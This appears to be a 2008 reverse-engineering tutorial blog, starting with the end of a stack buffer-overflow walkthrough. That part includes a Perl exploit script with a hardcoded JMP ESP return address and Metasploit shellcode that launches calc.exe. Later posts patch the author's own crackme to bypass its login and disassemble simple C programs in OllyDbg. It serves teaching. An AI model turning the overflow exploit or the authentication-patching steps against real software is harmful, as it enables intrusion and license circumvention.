0012FE8C   7C86467B  {F†|  kernel32.7C86467B
0012FE90   43434343  CCCC
0012FE94   43434343  CCCC

step through the RETN command…

and we find execution has landed at:

7C86467B   - FFE4                JMP ESP

and then of course – our EIP register looks like this:

EIP 0012FE90

demonstrating that we’re about to execute our C’s.

Now we step again and we find our useless-fact-of-the-day:  the byte “43” in hex is the opcode for INC EBX, as we see that the program is trying to execute the instructions:

Execution window:

0012FE90     43                  INC EBX
0012FE91     43                  INC EBX
0012FE92     43                  INC EBX
0012FE93     43                  INC EBX
0012FE94     43                  INC EBX
0012FE95     43                  INC EBX
0012FE96     43                  INC EBX
0012FE97     43                  INC EBX

Stack window:

0012FE90   43434343  CCCC
0012FE94   43434343  CCCC

yay for us!

Now let’s do something a bit more useful than incrementing EBX a hundred times eh?

How about we open the calculator program calc.exe?

Head on over to metasploit.com, choose shellcode, click demonstration version, filter modules to os::win32, pick “Windows Execute Command” and type “calc.exe” into the CMD field and hit the “generate payload” button.

Copy and paste the shellcode into your perl script like so, removing the C’s and adding $shellcode to the command line arguments:

#!/usr/local/bin/perl
$buffer = "A"x256;  #fills up the variable space
$buffer .= "A"x4;   #should overwrite the ebp address
$buffer .= "\x7B\x46\x86\x7C";   #should overwrite the return address with 7C86467B
$shellcode =
"\x2b\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xe2".
"\x61\xf1\x91\x83\xeb\xfc\xe2\xf4\x1e\x89\xb5\x91\xe2\x61\x7a\xd4".
"\xde\xea\x8d\x94\x9a\x60\x1e\x1a\xad\x79\x7a\xce\xc2\x60\x1a\xd8".
"\x69\x55\x7a\x90\x0c\x50\x31\x08\x4e\xe5\x31\xe5\xe5\xa0\x3b\x9c".
"\xe3\xa3\x1a\x65\xd9\x35\xd5\x95\x97\x84\x7a\xce\xc6\x60\x1a\xf7".
"\x69\x6d\xba\x1a\xbd\x7d\xf0\x7a\x69\x7d\x7a\x90\x09\xe8\xad\xb5".
"\xe6\xa2\xc0\x51\x86\xea\xb1\xa1\x67\xa1\x89\x9d\x69\x21\xfd\x1a".
"\x92\x7d\x5c\x1a\x8a\x69\x1a\x98\x69\xe1\x41\x91\xe2\x61\x7a\xf9".
"\xde\x3e\xc0\x67\x82\x37\x78\x69\x61\xa1\x8a\xc1\x8a\x91\x7b\x95".
"\xbd\x09\x69\x6f\x68\x6f\xa6\x6e\x05\x02\x90\xfd\x81\x4f\x94\xe9".
"\x87\x61\xf1\x91";

exec "c:\\stuff\\tools\\odbg110\\ollydbg ./overflowme.exe \"$buffer$shellcode\"";

Breaking down this bit of code is something for another day; suffice to say that it goes and opens the calculator.  It is called shellcode because usually you would use it to open a shell.  I think it was Aleph One who coined the phrase in his Phrack article “Smashing the Stack for Fun and Profit”.

Now we’re almost ready.  You’ll notice that when running through the above, it still fails miserably….

Here is where I admit my lack of patience to find out why:  I know it fails because the registers contain the wrong values, but I don’t know why adding 7 NOPs before the start of the shellcode fixes it.  Anyway, I’ll come back to that I guess.

So our final script is as follows:

#!/usr/local/bin/perl
$buffer = "A"x256;  #fills up the variable space
$buffer .= "A"x4;   #should overwrite the ebp address
$buffer .= "\x7B\x46\x86\x7C";   #should overwrite the return address with 7C86467B
$buffer .= "\x90"x7;
$shellcode =
"\x2b\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xe2".
"\x61\xf1\x91\x83\xeb\xfc\xe2\xf4\x1e\x89\xb5\x91\xe2\x61\x7a\xd4".
"\xde\xea\x8d\x94\x9a\x60\x1e\x1a\xad\x79\x7a\xce\xc2\x60\x1a\xd8".
"\x69\x55\x7a\x90\x0c\x50\x31\x08\x4e\xe5\x31\xe5\xe5\xa0\x3b\x9c".
"\xe3\xa3\x1a\x65\xd9\x35\xd5\x95\x97\x84\x7a\xce\xc6\x60\x1a\xf7".
"\x69\x6d\xba\x1a\xbd\x7d\xf0\x7a\x69\x7d\x7a\x90\x09\xe8\xad\xb5".
"\xe6\xa2\xc0\x51\x86\xea\xb1\xa1\x67\xa1\x89\x9d\x69\x21\xfd\x1a".
"\x92\x7d\x5c\x1a\x8a\x69\x1a\x98\x69\xe1\x41\x91\xe2\x61\x7a\xf9".
"\xde\x3e\xc0\x67\x82\x37\x78\x69\x61\xa1\x8a\xc1\x8a\x91\x7b\x95".
"\xbd\x09\x69\x6f\x68\x6f\xa6\x6e\x05\x02\x90\xfd\x81\x4f\x94\xe9".
"\x87\x61\xf1\x91";

exec "./overflowme.exe \"$buffer$shellcode\"";

You can remove the Olly call as I have done above and execute!

We should be rewarded with the following:

and this

and a terminal message stating that we have abnormal program termination.

And we can now do a root dance in celebration.

In the next blog we’ll look at what happens when we remove that hard-coded array, reducing the space on the stack, and how we can insert our shellcode prior to the return point.

There is also a follow-up to the article mentioned at the top of this post, which also goes into basic buffer overflows: http://www.ethicalhacker.net/content/view/165/2/

Until next time.

Posted by: nickfnord | October 2, 2008

Binary Analysis Basics Part III

Hello again,

This is yet another session reversing simple C programs in order to see how they work under the hood.

For this session, we’ll need the same tools as before:

A C compiler for windows (I’m using LCC: http://www.cs.virginia.edu/~lcc-win32/)
Ollydbg (http://www.ollydbg.de/)
IDA demo or free (http://www.datarescue.be/downloaddemo.htm)
A good text editor, or you can use the IDE which comes with LCC.
Knowledge of basic programming structure.
Basic knowledge of assembly language.
Some familiarity with OllyDbg
Knowledge of hex

This time, the hello world program will be a bit more complex.  There are a number of things I would like to demonstrate here.

1. This program is essentially a crackme.  It’s a very basic one, but there are three different “levels” I guess (for want of a better word) that we will go through when demonstrating how to crack it.  These three are:
Level1a: identify the password string for a particular login name. (Super easy)
Level1b: Bypass the authentication checking section by patching (easy (and cheating))
Level2: Create a keygen without understanding the algorithm (a bit harder)
Level3: Understand the algorithm just by looking at the source (more difficult but instructive)
2. This is still a simple trial program, but as you’ll see, things just got a whole lot more complicated.  The point of reversing is not always to understand the entire thing and in most cases you can’t because of the size of the program.  We just need to find what we’re looking for and understand a bit of how the program flows.
3. There are two constructs here that were deliberately left out of the previous two examples:  Loops and Functions.
4. In the process of doing the above, we’ll learn a bit more of the functionality of OllyDbg and IDAPro.

The approach we will take is one of an analyst looking at how we can achieve the three levels mentioned above, and as we do, points 2, 3 and 4 will be fully explored.  Also note that bypassing a login and gleaning the plain text password as easily as we will do is very unlikely to be possible on a commercial product or the harder crackmes that you’ll find around the place.  The purpose of this is just to learn what is possible.

Obviously we have the complete source code available to us for viewing, which we wouldn’t normally have when trying a crackme, but this is a learning exercise.

Now one thing I want to make clear here:  I do not condone bypassing the protection of commercial software just for the sake of using it without paying for it, regardless of whether it is legal or not in whatever country you are in.  The reason we are going through this “crackme” here is to demonstrate binary analysis, with the ultimate goal being complete understanding of the program.

So here’s the Code:

#include <stdio.h>
#include <string.h>
#include <ctype.h>

void keygen(char p[],char c[])
{
    int i,j;
    char key[] = "NICKFNORD";
    //generate password C=p+k(mod26) and check
    for(i=0,j=0;i<strlen(p);i++,j++)
    {
        if(j>=strlen(key))
        {
            j=0;
        }
        c[i] = ((toupper(p[i])-65+key[(j)]-65)%26+65);

    }
}

int main(void)
{
    char username[50];
    char password[50];
    char correctp[50];
    int i,j;

    for (i=0;i<50;i++)
    {
        correctp[i] = '\0';
        password[i] = '\0';
        //username[i] = '\0';
    }

    printf("Enter Username:\n");
    scanf("%s",username);
    printf("Enter Password:\n");
    scanf("%s",password);
    //find length of username/password, must be at least 8 characters
    if (strlen(username) < 8 | strlen(password) < 8)
    {
        printf("invalid username/password combination");
        return 1;
    }

    keygen(username,correctp);

    if (strcmp(correctp,password)==0)
    {
        printf("Hello World!\nThank you for logging in %s",username);
    }
    else
    {
        printf("invalid username/password combination");
    }
    return 0;
}

This time, we find that the disassembly is slightly different: our program is bigger and so there is more to scroll through to get to the bits that we’re interested in.  Instead of just a walkthrough of the code this time around, we’re going to treat this like a crackme and pretend that we haven’t seen the source code above.

So the first thing one would normally do is to run the program to see what we have:

C:\stuff\C>compile hello4

C:\stuff\C>lcc -o hello4.obj hello4.c

C:\stuff\C>lcclnk -o hello4.exe hello4.obj

C:\stuff\C>hello4
Enter Username:
ZZZZZZZZ
Enter Password:
AAAAAAAA
invalid username/password combination
C:\stuff\C>

What we are trying to do in the first instance here is identify parts of the program code that we can look for in order to know where the starting point of the protection may be.

So we open it up in Olly.  You’ll notice that although this is still a fairly simple program, there is a bit more complexity.  Olly has done its best to analyse the code and place brackets around significant blocks, but it isn’t clear where any of the messages above come from.  Most crackmes would also have a GUI, which adds even more complexity to the disassembly, so the easiest way to find your place in a program like this is to search for text strings.

Right click in the main program window -> search for -> all referenced text strings

You’ll see a short list of hard-coded strings that appear in the program:

Seeing as our first goal is to bypass the username/password code and get straight to whatever is behind it, we are most interested in what happens after we enter our username and password.  We notice that there are two lines that display our error message.  We can infer from this that there are multiple separate validations occurring that may trigger the error.  We do not know which validation check we have triggered.

There are a number of ways forward from here:  We can ignore the fact that we don’t know which check we have triggered and just see what the last one does and try to bypass that, or we can trace through from the start of the program to see what happens immediately after it requests our username/password.  For the moment, though, there is a glaringly obvious place to start:  the line that says “Hello World!Thank you for logging in %s”.  This is what we want to achieve, so let’s start there and work backwards.  Double click on that line in the strings window and Olly will take you to the portion of code referencing that string.

00401465  |. 83F8 00        CMP EAX,0
00401468  |. 75 16          JNZ SHORT hello4.00401480
0040146A  |. 8DBD 66FFFFFF  LEA EDI,DWORD PTR SS:[EBP-9A]
00401470  |. 57             PUSH EDI                                 ; /<%s>
00401471  |. 68 AAB04000    PUSH hello4.0040B0AA                     ; |format = "Hello World!Thank you for logging in %s"
00401476  |. E8 A2760000    CALL hello4._printf                      ; \_printf
0040147B  |. 83C4 08        ADD ESP,8
0040147E  |. EB 0D          JMP SHORT hello4.0040148D
00401480  |> 68 D3B04000    PUSH hello4.0040B0D3                     ; /format = "invalid username/password combination"
00401485  |. E8 93760000    CALL hello4._printf                      ; \_printf
0040148A  |. 83C4 04        ADD ESP,4
0040148D  |> B8 00000000    MOV EAX,0

Now we should recognise this construct immediately:

CMP command (or any command that sets the appropriate flags)
Conditional Jump (to start of code block 2)
Code block 1
Unconditional Jump(to line after end of code block 2)
Code block 2

This is an if-test type construct as we have previously seen.

We assume that the program will take our username, generate a correct password from it and compare that one with the one that we entered.  The first place to look for this is immediately prior to the successful login and failure messages.  In this instance, we can very clearly see that there is a call to strcmp, just prior to the compare command that triggers the conditional jump shown above:

00401455  |. 8D7D CA        LEA EDI,DWORD PTR SS:[EBP-36]
00401458  |. 57             PUSH EDI                                 ; /s2
00401459  |. 8D7D 98        LEA EDI,DWORD PTR SS:[EBP-68]            ; |
0040145C  |. 57             PUSH EDI                                 ; |s1
0040145D  |. E8 AE790000    CALL <JMP.&CRTDLL.strcmp>                ; \strcmp

We can see that it loads the addresses of two variables stored on the stack and pushes them onto the top of the stack prior to calling the strcmp function.  We can therefore assume that these two strings are going to be our password and the password generated by the program.  The easiest way to check is to set a breakpoint (F2) on line 0040145D and see what the situation is.

Run the program (F9) after setting the breakpoint and we can see that the top two lines of the stack are as per below:

0012FEBC   0012FF08  |s1 = "MHBJEMNQ"
0012FEC0   0012FF3A  \s2 = "AAAAAAAA"

So let’s give it a try:

C:\stuff\C>hello4
Enter Username:
ZZZZZZZZ
Enter Password:
MHBJEMNQ
Hello World!
Thank you for logging in ZZZZZZZZ
C:\stuff\C>

… and we see the magic words.

Now at this point it is also trivial to bypass the above if-test entirely.  Ollydbg allows us to make changes to this code and save our changes into another executable.  We basically want to remove this if-test, allowing us to get to the Hello World message regardless of what we put in the username and password fields.  To do this, we can do any number of things to stop the code from jumping.  The simplest way is to fill the command with NOPs (no-operation instructions).

Click on the JNZ line (00401468) and right click -> binary -> fill with NOPs

You should now see this:

00401465  |. 83F8 00        CMP EAX,0
00401468     90             NOP
00401469     90             NOP
0040146A  |. 8DBD 66FFFFFF  LEA EDI,DWORD PTR SS:[EBP-9A]

Now there is one more thing that we should take care of before writing this to another binary file.  If you scroll up, you’ll see the other “invalid username/password combination” string.  Because we don’t know which one we encountered when we ran through the program, we should take this out as well.  The assembly surrounding it is as follows:

00401429  |. 83FF 00        CMP EDI,0
0040142C  |. 74 14          JE SHORT hello4.00401442
0040142E  |. 68 D3B04000    PUSH hello4.0040B0D3                     ; /format = "invalid username/password combination"
00401433  |. E8 E5760000    CALL hello4._printf                      ; \_printf
00401438  |. 83C4 04        ADD ESP,4
0040143B  |. B8 01000000    MOV EAX,1
00401440  |. EB 50          JMP SHORT hello4.00401492
00401442  |> 8D7D 98        LEA EDI,DWORD PTR SS:[EBP-68]

This looks similar to our standard if-then-else test, except this time the second jump (the unconditional one) goes a very long way away.  If we follow it down, we’ll see that line 00401492 finalises the program and returns to the calling block.  What this looks like is an if-test without an else.  So in pseudo code we can assume that the programmer has written something like:

if EDI <> 0 then
print invalid message
exit program
end if;

In any case, because all we want to do here is bypass the invalid message and stop the program from exiting, we simply need to turn that conditional JE into an unconditional JMP.  Once again, right click -> assemble.

change the text to

JMP SHORT 00401442

and assemble.

and it should now look like this

0040142C     EB 14          JMP SHORT hello4.00401442

We are now ready to save our changes into a separate executable.

Right-click in the disassembly window -> copy to executable -> all modifications -> “copy all”.
This will bring up another window with our modified disassembly.  Right click -> Save file.  Change the name to something else; in this case I’m calling it Hello4patched.exe

Now let’s run it and see how it works:

C:\stuff\C>hello4patched.exe
Enter Username:
AAAAAAAA
Enter Password:
ZZZZZZZZ
Hello World!
Thank you for logging in AAAAAAAA

C:\stuff\C>hello4patched.exe
Enter Username:
asdf
Enter Password:
asdf
Hello World!
Thank you for logging in asdf
C:\stuff\C>

Well, hey!  There we go.  Now that was easy, wasn’t it?  With a bare minimum of understanding of the program’s workings we managed to bypass the two sections of security, and heck, we didn’t even figure out what either of them actually did.

Now on a very serious note: What I just demonstrated was absolute rubbish:

We didn’t learn anything whatsoever about the program
We still haven’t figured out what algorithm is used to generate the passwords
There is only a minuscule chance that any actual commercial product will allow us to simply bypass an if-test or two in order to get to the main program.
We didn’t actually achieve anything useful whatsoever in relation to learning how to reverse, with the exception of learning how to patch executables using ollydbg.

The goal here is to be able to understand common constructs and to be able to find what we’re looking for in the disassembly as fast as possible.

There are quite a few things we need to analyse and find out:

What is that first lot of validation that seems to happen before comparing the strings?
What do the few lines of code before the enter username line do?
What algorithm is used to determine the password?
Can we possibly duplicate this algorithm in a program of our own?

We’ll deal with these in the next blog, where we go on to deconstructing loops and looking at Level 2 of the goals mentioned at the start of this blog.

until then.

Nick.

I have to say that I really had to force myself to work through the above so that I could understand it enough to write it down and explain it all to someone else.  The reason is that IDAPro is seriously better at giving the reverser a good overview of a program’s flow.

As I was going through the above, I sometimes referenced IDAPro, but I made myself understand what was going on in Olly just to exercise my brain.  After all, I’m not here to crack my own hello world program, I’m here to learn stuff.

Posted by: nickfnord | October 1, 2008

Binary Analysis Basics Part II

In the previous blog, we broke down a couple of simple C programs that we compiled and disassembled, analysing how such constructs as if-then-else and basic comparisons look when disassembled.  In this one we do the same thing with another fundamental construct:  Arrays.

You will need:

A C compiler for windows (I’m using LCC: http://www.cs.virginia.edu/~lcc-win32/)
Ollydbg (http://www.ollydbg.de/)
IDA demo or free (http://www.datarescue.be/downloaddemo.htm)
A good text editor, or you can use the IDE which comes with LCC.
Knowledge of basic programming structure (you don’t have to know C as I’ll explain the relevant bits).
Basic knowledge of assembly language (just have a read through PCASM first and keep it as a reference).
Some familiarity with OllyDbg
Knowledge of hex

The following C code adds a few more complexities that are essential to understand when reversing.

#include <stdio.h>
#include <string.h>
int main(void)
{
    char name[20];
    char rname[] = "NickFnord";

    printf("Enter Name:\n");
    scanf("%s",name);

    printf("\nThe Array of characters that you entered was: %s\n",name);
    printf("Name array starts at: %d\n",name);
    printf("first char of array has ascii value of: %d\n",name[0]);

    if (strcmp(name, rname) == 0)
    {
        printf("Hello World\n");
    }
    else
    {
        printf("No Greeting for you\n");
    }

    return 0;
}

The first important thing to understand, if you’re new to programming or have only worked in higher level languages, is that strings, such as the two declared above, are actually stored as an array of characters.  The second thing to note is that we cannot do a direct comparison of the entire string.  Because it is effectively not an actual string now, but an array of characters, we must either compare each character individually, or call a function which does the same.  So we have included the string.h header in order to have access to the strcmp function.  Also note that when you are running this program, the scanf function will only read the first word you type, i.e. it will stop reading your input when it finds a white space.  We could use the “gets” function in order to capture multiple words but we’ll look at that next time.

First, before opening Olly, run the program to see what it outputs.

c:\stuff\C>hello3
Enter Name:
NickFnord

The Array of characters that you entered was: NickFnord
Name array starts at: 1245020
first char of array has ascii value of: 78
Hello World

c:\stuff\C>hello3

So let’s take a look under the hood.

004012D4  /$ 55             PUSH EBP
004012D5  |. 89E5           MOV EBP,ESP
004012D7  |. 83EC 20        SUB ESP,20
004012DA  |. 56             PUSH ESI
004012DB  |. 57             PUSH EDI
004012DC  |. 8D7D E2        LEA EDI,DWORD PTR SS:[EBP-1E]
004012DF  |. 8D35 A0B04000  LEA ESI,DWORD PTR DS:[40B0A0]
004012E5  |. B9 0A000000    MOV ECX,0A
004012EA  |. F3:A4          REP MOVS BYTE PTR ES:[EDI],BYTE PTR DS:[ESI]

At line 004012DC we can see that the stack address of EBP-1E is loaded into EDI.  Your mileage may vary, but for me, EBP is 0012FF70 and so EDI will be 0012FF52 after that command has been run.  This is half-way between two entries on the stack displayed by Olly and, as we will find out later, this will store the variable declared at the beginning of the program, containing “NickFnord”.

You’ll notice that at the second LEA on line 004012DF, the program has taken the memory address referring to the constant “NickFnord” and placed it in the ESI register.  You can follow it in the dump to see it along with other constants that have been stored in the program’s data segment.  The command “MOVS BYTE PTR ES:[EDI],BYTE PTR DS:[ESI]” transfers the byte referred to by the address stored at ESI into the address stored at EDI, but the REP prefix in front causes this command to be repeated, using the register ECX as a counter and incrementing EDI and ESI each time around.  As the ECX register was set to 0A (or 10 in decimal) in the previous command, we know that it will repeat the MOVS command 10 times, moving along the dump one byte each time, and therefore take 10 bytes starting from the memory address stored in ESI (0040B0A0) and place them in turn in the stack, which will now look something like this:

0012FF50   694E1EE0  àNi
0012FF54   6E466B63  ckFn
0012FF58   0064726F  ord.
0012FF5C   0012FF70  pÿ.
0012FF60   0012FF6C  lÿ.
0012FF64   7C910208  ‘|  ntdll.7C910208

The next bit is nothing too complicated:

004012EC  |. 68 48B14000    PUSH hello3.0040B148                     ; /format = "Enter Name:"
004012F1  |. E8 8B760000    CALL hello3._printf                      ; \_printf
004012F6  |. 83C4 04        ADD ESP,4
004012F9  |. 8D7D EC        LEA EDI,DWORD PTR SS:[EBP-14]
004012FC  |. 57             PUSH EDI

This prints out the string stored at 0040B148 and then uses the LEA command to prepare the way for the user’s input.  We’ll notice that the address referred to by EBP-14 is 0012FF5C, which is immediately after the space that was used to store the variable containing NickFnord.  This is where our input string will be stored.  As this address is now contained in the EDI register and is pushed as an argument, we can guess that the scanf function below will write its output to the address held in EDI.

004012FD  |. 68 45B14000    PUSH hello3.0040B145                     ; /format = "%s"
00401302  |. E8 A1430000    CALL hello3._scanf                       ; \_scanf
00401307  |. 83C4 08        ADD ESP,8
0040130A  |. 8D7D EC        LEA EDI,DWORD PTR SS:[EBP-14]
0040130D  |. 57             PUSH EDI                                 ; /<%s>
0040130E  |. 68 12B14000    PUSH hello3.0040B112                     ; |format = "The Array of characters that you entered was: %s"
00401313  |. E8 69760000    CALL hello3._printf                      ; \_printf
00401318  |. 83C4 08        ADD ESP,8

When running through this time, I have put “ZZZZZZZZZZ” into the input value to make it a bit easier to distinguish between this value and the constant NickFnord declared earlier.  After this section of code, our stack should look like this:

0012FF50   694E1EE0  àNi
0012FF54   6E466B63  ckFn
0012FF58   0064726F  ord.
0012FF5C   5A5A5A5A  ZZZZ
0012FF60   5A5A5A5A  ZZZZ
0012FF64   7C005A5A  ZZ.|

So the scanf function will take the input value, insert it into the allocated memory space and append a null terminator.  You can see that the constant “NickFnord” is also followed by a null character.  This fact becomes significant later on when we look at buffer overflows.  What happens if we put in more than the allocated 20 characters?  What happens if we overwrite the return address stored in 0012FF74 and cause it to point elsewhere?  Our program should really validate the length of the user input prior to copying it into memory.  More on that another time though.

Next bit then:

0040131B  |. 8D7D EC        LEA EDI,DWORD PTR SS:[EBP-14]
0040131E  |. 57             PUSH EDI                                 ; /<%d>
0040131F  |. 68 F8B04000    PUSH hello3.0040B0F8                     ; |format = "Name array starts at: %d"
00401324  |. E8 58760000    CALL hello3._printf                      ; \_printf
00401329  |. 83C4 08        ADD ESP,8
0040132C  |. 0FBE7D EC      MOVSX EDI,BYTE PTR SS:[EBP-14]
00401330  |. 57             PUSH EDI                                 ; /<%d>
00401331  |. 68 CCB04000    PUSH hello3.0040B0CC                     ; |format = "first char of array has ascii value of: %d"
00401336  |. E8 46760000    CALL hello3._printf                      ; \_printf
0040133B  |. 83C4 08        ADD ESP,8

You’ll notice that in this section, the LEA command again references the start of the user entered array.  This is redundant as this address has already been loaded into EDI.  However, you’ll notice the MOVSX command is also referencing the same location in memory, just that this time it is referencing the data rather than loading the effective address, and so we know from the above section of the stack that it will return to the user the value 5A, or 90 in decimal, which is the ASCII value for “Z”.

0040133E  |. 8D7D E2        LEA EDI,DWORD PTR SS:[EBP-1E]
00401341  |. 57             PUSH EDI                                 ; /s2
00401342  |. 8D7D EC        LEA EDI,DWORD PTR SS:[EBP-14]            ; |
00401345  |. 57             PUSH EDI                                 ; |s1
00401346  |. E8 29790000    CALL <JMP.&CRTDLL.strcmp>                ; \strcmp
0040134B  |. 83C4 08        ADD ESP,8
0040134E  |. 83F8 00        CMP EAX,0
00401351  |. 75 0F          JNZ SHORT hello3.00401362

This section prepares the data “NickFnord” and the data that we entered by loading their addresses into EDI and then pushing them one after another onto the stack.  You’ll notice something very handy about Olly in that it performs some of the calculations for you in the bit under the program window, so when EIP is pointing at 0040133E for example (i.e. about to execute this line) you will notice that Olly tells you the stack address being referred to by EBP-1E and the null-terminated array stored at that address, as well as the current value of EDI:

Stack address=0012FF52, (ASCII "NickFnord")
EDI=0000005A

This makes debugging a whole lot quicker as you don’t have to manually calculate addresses if you want to know what part of the stack to watch.

At the second LEA command your window should display:

Stack address=0012FF5C, (ASCII "ZZZZZZZZZZZZZZZZZZZZ")
EDI=0012FF52, (ASCII "NickFnord")

Showing that it is now loading the string that we entered.

The call to strcmp compares the two arrays of characters, and if we step to the next command we see that it has placed a “1” into the EAX register rather than just changing the zero flag.  As a result we merely need to compare the EAX register to a hardcoded 0 in order to set the appropriate flag for jumping.  Once again, in these types of comparisons, 0 = no difference and anything else = difference (strcmp returns a negative or positive number depending on which string sorts first; here it happens to be 1).  So when a 1 is returned from the strcmp function we know that the strings are different, and since 1<>0 the zero flag is not set and the program execution jumps.  Run the program through again and insert the correct string to prove it for yourself and to see it in action.

00401353  |. 68 BFB04000    PUSH hello3.0040B0BF                     ; /format = "Hello World"
00401358  |. E8 24760000    CALL hello3._printf                      ; \_printf
0040135D  |. 83C4 04        ADD ESP,4
00401360  |. EB 0D          JMP SHORT hello3.0040136F
00401362  |> 68 AAB04000    PUSH hello3.0040B0AA                     ; /format = "No Greeting for you"
00401367  |. E8 15760000    CALL hello3._printf                      ; \_printf
0040136C  |. 83C4 04        ADD ESP,4
0040136F  |> B8 00000000    MOV EAX,0
00401374  |. 5F             POP EDI
00401375  |. 5E             POP ESI
00401376  |. C9             LEAVE
00401377  \. C3             RETN

The remainder of the program is fairly straightforward – as in the previous excersise we see an if-test in action.

Once again, it may be instructive to open the program in IDA to see how it displays it.  I’d recommend running through the progam a couple of times in IDA also to become familiar with it in addition to Olly as they each have their advantages.

Now at this point I was going to compile this C program using another tool and see if there were any differences in the resultant binary. But after downloading Microsoft Visual C++, removing its Firefox plugin that I didn’t ask for, spending 20 mins hunting around for the damn compile button before realising that I needed to “create a solution” before compiling, and then not being able to compile it because it doesn’t recognise the strcmp function, I gave it up. Perhaps I’ll do that another time…

Once again, I hope this has been educational.  Feel free to leave comments!

Nick.

Posted by: nickfnord | September 30, 2008

Binary Analysis Basics

One thing I have found over the couple of times I have dabbled in reversing is that a common learning strategy for newbies is to get straight into trying crackmes without having a basic understanding of what the hell they’re doing. Guided by poorly written “tuts” or tutorials, often sprinkled liberally with shocking spelling, the tendency is to try to glean information from seeing it done. From a random sampling of tutorials found on www.crackmes.de and other places, I have found that a very large portion of them do not fully explain what is going on and why the reverser chose to put the breakpoint where he/she did. For example, things like “I put a brake pnt ther becoz my spidy sense told me to lol, u will haf to figar out why 4 urself” happen surprisingly often. Alternatively, the tutorial writer doesn’t write a tutorial at all and merely posts the answer without any guidance on how to arrive at it. This is fine if you have some experience, but for a newbie it can certainly be frustrating, resulting in the newbie being able to at best go through the motions laid out in the tutorial without understanding what is being done. Don’t get me wrong, there are some excellent tutorials out there, written by people who care that people are reading and following along, but they are few and far between.

So in order to avoid this, the strategy that I initially started with this time around was to learn to program in assembly and then go from there. I had hoped that having a solid understanding of assembly language would assist in reversing. To my surprise, this has also caused me great frustration. The thing is, code written by a human, regardless of the language, is compiled by a computer into the most efficient form according to the type of compiler and the optimising options set, and sometimes there may be a trade-off between things like speed of execution, memory usage and size of the final executable. Certain mathematical operations, for example, may be switched around and handled in completely different ways than a human would logically expect, and comparisons and jumps changed accordingly, or code interleaved in order to get more efficient execution.

The end result is that the code that the CPU executes may look entirely different from the code that the human wrote. My conclusion, therefore, is that if your goal is to learn to reverse, teaching yourself to write programs in assembly language will only be useful up to a certain point.

The ultimate goal of any reversing session is to understand the program flow well enough that you could at least write pseudocode describing its functionality. This level of understanding may not be necessary in all cases, depending on your reasons for reversing, but it should still be the goal that you aim for from the start. And since you will never have the hand-written code to look at, it is more profitable to learn what certain higher level logic looks like after it has been compiled, linked and then disassembled.

So what I am doing in this post, and possibly subsequent posts, is going through, at a very basic level, the breakdown of simple instructions as viewed via a disassembler.

You will need:
————–
A C compiler for Windows (I’m using LCC: http://www.cs.virginia.edu/~lcc-win32/)
OllyDbg (http://www.ollydbg.de/)
IDA demo or free (http://www.datarescue.be/downloaddemo.htm)
A good text editor, or you can use the IDE which comes with LCC.
Knowledge of basic programming structure (you don’t have to know C as I’ll explain the relevant bits).
Basic knowledge of assembly language (just have a read through PCASM first and keep it as a reference).
Some familiarity with OllyDbg
Knowledge of hex

First we’ll start with the standard Hello World program.

I’m using the command line rather than the GUI of LCC because I find it more flexible to work with when just compiling small amounts of code like this.

Install LCC -> right click on “my computer” -> properties -> Advanced tab -> environment variables -> edit the “path” variable and put the directory that you have installed lcc into at the beginning of the line followed by a semicolon e.g. “C:\lcc\bin;”.
Create a file called “compile.bat” in the directory that you will be working in and put the following in it:

lcc -o %1.obj %1.c
lcclnk -o %1.exe %1.obj

Type the following C program into your chosen text editor and save it as hello.c

#include <stdio.h>
int main(void)
{
printf("Hello World\n");
return 0;
}

Now you can just type into the command line

compile hello

and it will create a file called hello.exe

This classic program obviously prints “Hello World” out to the screen. But in order for this seemingly simple task to be accomplished, there is far more going on under the hood. Specifically, printf is a function contained in the stdio library which will display information to the screen. In the completed binary, the entirety of the printf code will be integrated into the binary.

So let’s open it up in OllyDbg.

As you can see, there’s quite a bit more stuff in there apart from what we’ve written. Notice that you get placed at what Ollydbg thinks is the entry point for the program. The purpose of this example is not to go through this, but to determine what the compiler has done with our code.

Scroll down until you get to the following:

004012D4  /$ 68 A0A04000    PUSH hello.0040A0A0                      ; /format = "Hello World"
004012D9  |. E8 DB5E0000    CALL hello._printf                       ; \_printf
004012DE  |. 83C4 04        ADD ESP,4
004012E1  |. B8 00000000    MOV EAX,0
004012E6  \. C3             RETN

This section of the code pushes the address 0040A0A0, which is where the “Hello World” string is stored, onto the stack and then calls the function printf. You can see what is stored at 0040A0A0 by right clicking on the command in OllyDbg and selecting “follow in dump -> Immediate Constant”. This data is put in place when the program is loaded. You can see exactly what the _printf function does by stepping into it during runtime (set a breakpoint at that line and hit F7 to step into the code).
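One detail worth spelling out is that what gets pushed is the address of the string, not its characters. Here is a small C sketch of the same idea. The names greeting and print_greeting are assumptions for illustration only; printf is handed a pointer (the equivalent of PUSH hello.0040A0A0) and the characters stay where they are in memory.

```c
#include <stdio.h>

/* Hypothetical stand-in for the string stored at 0040A0A0 */
static const char greeting[] = "Hello World\n";

/* Passes the string's address to printf, much like the PUSH/CALL pair.
   Returns printf's result: the number of characters written. */
int print_greeting(void)
{
    const char *format = greeting;  /* a pointer, i.e. just an address */
    return printf("%s", format);
}
```

The sketch goes through "%s" rather than using the string as the format directly, which is a slightly different call from the one in hello.c but shows the same thing: only one 4-byte pointer travels via the stack, which is why the caller cleans up with ADD ESP,4 afterwards.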

Next we’ll add a bit more complexity and demonstrate a few more things at once:

#include <stdio.h>
int main(void)
{
int num;

if (2==2)
{
printf("Hello World\n");
}
else
{
printf("No Greeting for you\n\n");
}

printf("enter a number\n");
scanf("%d",&num);
if (num==2)
{
printf("number = 2\n");
}
else
{
printf("number <> 2\n");
}

printf("The address of number is: %d and the value is %d",&num, num);

return 0;
}

So let’s compile this and open it up in Olly.

Again we’ve been placed at the entry point to the program. Scroll down until you see the following:

004012D4   $ 55             PUSH EBP
004012D5   . 89E5           MOV EBP,ESP
004012D7   . 51             PUSH ECX
004012D8   . 57             PUSH EDI
004012D9   . 68 FFB04000    PUSH hello2.0040B0FF                     ; /format = "Hello World"
004012DE   . E8 76760000    CALL hello2._printf                      ; \_printf
004012E3   . 83C4 04        ADD ESP,4
004012E6   . EB 0D          JMP SHORT hello2.004012F5
004012E8   . 68 E9B04000    PUSH hello2.0040B0E9                     ; /format = "No Greeting for you"
004012ED   . E8 67760000    CALL hello2._printf                      ; \_printf
004012F2   . 83C4 04        ADD ESP,4

